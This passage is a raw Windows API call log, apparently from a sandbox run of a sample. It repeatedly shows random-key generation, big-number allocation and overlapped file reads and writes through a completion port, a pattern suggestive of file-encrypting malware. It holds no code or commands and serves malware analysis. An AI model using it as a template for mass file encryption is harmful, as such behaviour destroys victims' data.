| out: pbBuffer=0x322f970) returned 0x0 [0109.245] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0109.245] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0109.245] free (_Block=0x77d800) [0109.245] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0109.245] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0109.245] free (_Block=0x1fa4848) [0109.245] free (_Block=0x2071818) [0109.245] free (_Block=0x77d908) [0109.245] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.246] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0109.247] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x4c20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.247] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0109.257] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xeb8, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.257] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0109.257] CloseHandle (hObject=0x13c0) returned 1 [0109.258] free (_Block=0x1ff1e60) [0109.258] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0109.266] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.267] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.267] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0109.267] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.267] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.267] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0109.268] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0109.268] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0109.268] free (_Block=0x77d800) [0109.268] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0109.268] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0109.268] free (_Block=0x1fa4848) [0109.268] free (_Block=0x2071818) [0109.268] free (_Block=0x77d908) [0109.268] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.268] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0109.269] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xd20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.269] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0109.279] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x714c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.280] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0109.291] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x532, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.291] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0109.292] CloseHandle (hObject=0x13c0) returned 1 [0109.296] free (_Block=0x1ff1e60) [0109.296] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0109.304] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.304] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.304] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0109.304] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.305] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.305] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0109.305] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0109.305] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0109.305] free (_Block=0x77d800) [0109.305] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0109.305] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0109.305] free (_Block=0x1fa4848) [0109.305] free (_Block=0x2071818) [0109.305] free (_Block=0x77d908) [0109.305] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.306] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0109.306] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.306] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0109.321] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1f26, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.322] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0109.322] CloseHandle (hObject=0x13c0) returned 1 [0109.328] free (_Block=0x1ff1e60) [0109.328] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0109.343] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.344] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.344] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0109.344] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.345] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.345] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0109.345] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0109.345] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0109.345] free (_Block=0x77d800) [0109.345] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0109.345] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0109.345] free (_Block=0x1fa4848) [0109.345] free (_Block=0x2071818) [0109.345] free (_Block=0x77d908) [0109.345] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.345] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0109.356] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.356] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.356] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0109.356] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.357] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.357] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0109.357] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0109.357] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0109.357] free (_Block=0x77d800) [0109.357] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0109.357] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0109.357] free (_Block=0x1fa4848) [0109.357] free (_Block=0x2071818) [0109.358] free (_Block=0x77d908) [0109.358] WriteFile (in: hFile=0x81c, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0109.359] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0109.366] CloseHandle (hObject=0x13c0) returned 1 [0109.367] free (_Block=0x1ff1e60) [0109.367] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0109.374] ReadFile (in: hFile=0x3bc, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x876, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0109.374] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0109.400] CloseHandle (hObject=0x3bc) returned 1 [0109.402] free (_Block=0x3ef0008) [0109.402] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0109.411] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x6b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0109.411] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0109.425] ReadFile (in: hFile=0x3ac, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x1370, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0109.439] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0109.451] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.451] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.451] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0109.451] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.452] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.452] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0109.452] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0109.452] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0109.452] free (_Block=0x77d800) [0109.452] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0109.452] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0109.453] free (_Block=0x1fa4848) [0109.453] free (_Block=0x2071818) [0109.453] free (_Block=0x77d908) [0109.453] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0109.453] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0109.488] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.488] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.488] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0109.490] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.490] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.490] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0109.494] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0109.494] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0109.494] free (_Block=0x77d800) [0109.494] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0109.494] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0109.494] free (_Block=0x1fa4848) [0109.494] free (_Block=0x2071818) [0109.494] free (_Block=0x77d908) [0109.495] WriteFile (in: hFile=0x2f4, lpBuffer=0x3db00ec*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8) returned 1 [0109.500] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0109.523] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.523] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.523] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0109.523] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.524] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.524] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0109.524] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0109.524] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0109.524] free (_Block=0x77d800) [0109.524] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0109.524] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0109.524] free (_Block=0x1fa4848) [0109.524] free (_Block=0x2071818) [0109.525] free (_Block=0x77d908) [0109.525] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.525] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0109.534] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.535] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.535] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0109.535] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.536] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.536] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0109.536] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0109.536] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0109.536] free (_Block=0x77d800) [0109.536] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0109.536] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0109.537] free (_Block=0x1fa4848) [0109.537] free (_Block=0x2071818) [0109.537] free (_Block=0x77d908) [0109.537] WriteFile (in: hFile=0x81c, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0109.537] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0109.549] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.550] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.550] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0109.550] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.550] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.550] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0109.551] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0109.551] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0109.551] free (_Block=0x77d800) [0109.551] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0109.551] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0109.551] free (_Block=0x1fa4848) [0109.551] free (_Block=0x2071818) [0109.551] free (_Block=0x77d908) [0109.551] WriteFile (in: hFile=0x13c0, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0109.552] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0109.569] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.570] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.570] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0109.570] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.570] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.571] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0109.574] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0109.574] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0109.574] free (_Block=0x77d800) [0109.574] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0109.574] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0109.575] free (_Block=0x1fa4848) [0109.575] free (_Block=0x2071818) [0109.575] free (_Block=0x77d908) [0109.575] WriteFile (in: hFile=0x3bc, lpBuffer=0x3d7007c, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 0x0 [0109.575] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0109.582] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.583] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.583] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0109.583] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.583] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.583] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0109.586] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0109.586] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0109.586] free (_Block=0x77d800) [0109.586] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0109.587] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0109.587] free (_Block=0x1fa4848) [0109.587] free (_Block=0x2071818) [0109.587] free (_Block=0x77d908) [0109.587] WriteFile (in: hFile=0x3ac, lpBuffer=0x3db00ec*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8) returned 1 [0109.587] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0112.255] WriteFile (in: hFile=0x81c, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0xb90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0112.255] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, 